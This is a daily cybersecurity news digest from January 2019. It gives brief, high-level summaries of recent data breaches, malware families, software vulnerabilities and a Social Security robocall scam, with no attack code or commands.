Cyware Daily Threat Intelligence January 11, 2019

Top Breaches Reported in Last 24 Hours

Unprotected MongoDB leaks data again
An unprotected MongoDB database containing around 854 GB of data and over 200 million resumes from Chinese job seekers was left open to public for at least a week. The exposed CVs contained information such as full names, dates of birth, phone numbers, email addresses and other details of individuals.

DNS hijacking campaign
A sophsiticated hacking campaign that involves hijacking of dozens of DNS domains has been discovered by security researchers. These domains belong to to the government, telecommunications and internet infrastructure entities across the Middle East and North Africa, Europe and North America. Iran-based threat actors are believed to be behind this campaign. 

USD 18.6 million stolen
Chinese fraudsters have reportedly siphoned off about $18.6 million from the Indian unit of Tecnimont SpA by taking local managers into confidence. Scammers inpersonated the Chief Executive Officer(CEO) of the firm to carry out the fraud campaign. 

Top Malware Reported in Last 24 Hours

ICEPICK-3PC malware
A new malware strain dub as as ICEPICK-3PC has been found stealing device IP addresses by hacking a website's third-party tools which are pre-loaded onto clients platforms by self service agencies. Once installed, the malware performs a series of checks to evade detection. This includes checking the user agent, device type, mobile operating system, battery level and device motion and orientation.

ServHelper and FlawedGrace
Researchers have discovered that TA505 threat actor group is using two new malware families to target banks and retail industries. This includes two variants of ServHelper backdoor malware and FlawedGrace remote access trojan (RAT). They help the hackers to establish remote desktop access and steal personal data.

Alcatel phones contain malware
An app, named Weather Forecast-World Weather Accurate Radar, has been found to contain malware. The app comes pre-installed in Alcatel smartphones and is available for download on Google Play store. Security researchers discovered that the malware in the app was harvesting users' data and sending it to a server in China. 

Top Vulnerabilities Reported in Last 24 Hours

DX.Exchange fixes a flaw
Cryptocurrency and tokenized stock exchange platform DX.Exchange has fixed a critical bug that leaked users' sensitive data. The exchange was alerted about the bug by a trader. Following the discovery, the firm was quick at taking action and successfully patched the bug. 

Bug in MS Office
An information disclosure vulnerability dubbed as CVE-2019-0560 has been discovered in MS Office. Attackers can exploit the flaw to obtain sensitive information that may aid in future attacks. The flaw allows documents with ActiveX controls to leak users' info such as usernames and passwords. 

Bypassing MS Office 365 protection
Hackers are using a simple technique to bypass the security features of Microsoft Office 365. Named as 'Zero-Width SPaces'(ZWSPs), the technique can enable hackers to insert multiple zero-width spaces within malicious URLs that are being sent via phishing emails. Microsoft email processing systems do not recognize these URLs as a link and hence it becomes easy for attackers to harvest credentials and other sensitive details of end-users. 

Top Scams Reported in 24 Hours

New Robocall scam
The Federal Trade Commission(FTC) is warning residents of America about a new Social Security Number(SSN) scam. The new Robocall scam involves a fraudster pretending to be from the Social Security Administration (SSA) and trying to get users' SSN or their money. In some cases, the impostor claim that victims’ bank account is about to be seized and they advise victims on how to keep money safe including putting money on fake gift cards. Users are advised not to share their SSN, bank account number or credit card number to anyone over the phone. 




  • Share this blog:
To enhance your experience on our website, we use cookies to help us understand how you interact with our website. By continuing navigating through Cyware’s website and its products, you are accepting the placement and use of cookies. You can also choose to disable your web browser’s ability to accept cookies and how they are set. For more information, please see our Privacy Policy.